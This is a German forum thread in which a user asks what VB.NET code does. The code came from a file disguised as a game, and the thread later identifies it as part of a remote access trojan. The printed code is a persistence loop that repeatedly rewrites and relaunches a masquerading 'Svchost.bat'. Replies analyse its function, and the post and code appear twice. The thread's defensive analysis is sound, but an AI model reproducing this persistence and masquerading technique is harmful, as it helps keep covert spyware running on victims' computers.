93875
Sep 24, 2010
5557
3
0
Programm Code was bedeutet diese batch?
Was bedeutet der Text?
Vermute ein bisschen selbstgebastelte Maleware ?
So ein Horst hat mir das als "Spiel für die Mittagspause geschickt" getarnt
und der Spaten meint das es überhaupt nicht auffällt wenn plötzlich eine
Datei unter
C:\Users\Username\appData\Roaming\
mit dem Namen Svchost.bat fragt ausgeführt zu werden
Option Strict On
Imports System.Windows.Forms
Imports System
Imports System.Diagnostics.Process
Public Class Main
Public Shared Sub Main()
Dim sPfad As String = "$install$"
Dim sprozess As String = "Svchost.bat"
Dim DateiBytes() As Byte
DateiBytes = My.Computer.FileSystem.ReadAllBytes(sPfad)
While True
Dim FindeProzess As Boolean = False
For Each p As System.Diagnostics.Process In System.Diagnostics.Process.GetProcessesByName(sprozess)
Try
If p.MainModule.FileName.EndsWith("Svchost.bat") Then
FindeProzess = True
Exit For
End If
Catch ex As Exception
FindeProzess = False
End Try
Next
If FindeProzess = False Then
If My.Computer.FileSystem.FileExists(sPfad) = False Then
Try
My.Computer.FileSystem.WriteAllBytes(sPfad, DateiBytes, False)
System.Diagnostics.Process.Start(sPfad)
Catch ex As Exception
End Try
Else
Try
System.Diagnostics.Process.Start(sPfad)
Catch ex As Exception
End Try
End If
End If
System.Threading.Thread.Sleep(200)
End While
End Sub
End Class
Vermute ein bisschen selbstgebastelte Maleware ?
So ein Horst hat mir das als "Spiel für die Mittagspause geschickt" getarnt
und der Spaten meint das es überhaupt nicht auffällt wenn plötzlich eine
Datei unter
C:\Users\Username\appData\Roaming\
mit dem Namen Svchost.bat fragt ausgeführt zu werden
Option Strict On
Imports System.Windows.Forms
Imports System
Imports System.Diagnostics.Process
Public Class Main
Public Shared Sub Main()
Dim sPfad As String = "$install$"
Dim sprozess As String = "Svchost.bat"
Dim DateiBytes() As Byte
DateiBytes = My.Computer.FileSystem.ReadAllBytes(sPfad)
While True
Dim FindeProzess As Boolean = False
For Each p As System.Diagnostics.Process In System.Diagnostics.Process.GetProcessesByName(sprozess)
Try
If p.MainModule.FileName.EndsWith("Svchost.bat") Then
FindeProzess = True
Exit For
End If
Catch ex As Exception
FindeProzess = False
End Try
Next
If FindeProzess = False Then
If My.Computer.FileSystem.FileExists(sPfad) = False Then
Try
My.Computer.FileSystem.WriteAllBytes(sPfad, DateiBytes, False)
System.Diagnostics.Process.Start(sPfad)
Catch ex As Exception
End Try
Else
Try
System.Diagnostics.Process.Start(sPfad)
Catch ex As Exception
End Try
End If
End If
System.Threading.Thread.Sleep(200)
End While
End Sub
End Class
Share on Facebook
Share on Twitter
Share on Reddit
Share on LinkedinPlease also mark the comments that contributed to the solution of the article
Content-Key: 151739
Url: https://administrator.de/contentid/151739
Printed on: April 24, 2024 at 12:04 o'clock
3 Comments
Latest comment
Alles was der Code macht ist eine Datei
Was das mit einem Spiel zu tun hat: Nichts.
svchost.bat auf den Rechner zu kopieren und zu überwachen, dass die immer ausgeführt wird.Was das mit einem Spiel zu tun hat: Nichts.
... wobei übrigens die eigentlich Fragestellung noch nicht beantwortet werden kann, da bisher nur ein VB-Code gepostet wurde - was in der "svchost.bat" steht, ist daraus natürlich nicht ersichtlich ...
Grüße
bastla
Grüße
bastla
Also ich habs rausgefunden.
Als spiel getarte Datei die halt diese getarnte svchost ins c kopiert.
Wenn ich jetzt auf ausführen gehe dann kann der Typ meinen PC überwachen und alles mögliche Umstellen.
Er hat mir das Prog geschickt des ist ein Virus oder was auch immer der irgendwas mit "..... Rat" heist.
Ist also erledigt
Rausgeredet hat der typ sich mit ausversehen da er ja "seine freundin die evtl. fremdgeht überwachen" kann.
(Fand ich ziemlich lächerlich)
Danke für die Hilfe.
Als spiel getarte Datei die halt diese getarnte svchost ins c kopiert.
Wenn ich jetzt auf ausführen gehe dann kann der Typ meinen PC überwachen und alles mögliche Umstellen.
Er hat mir das Prog geschickt des ist ein Virus oder was auch immer der irgendwas mit "..... Rat" heist.
Ist also erledigt
Rausgeredet hat der typ sich mit ausversehen da er ja "seine freundin die evtl. fremdgeht überwachen" kann.
(Fand ich ziemlich lächerlich)
Danke für die Hilfe.
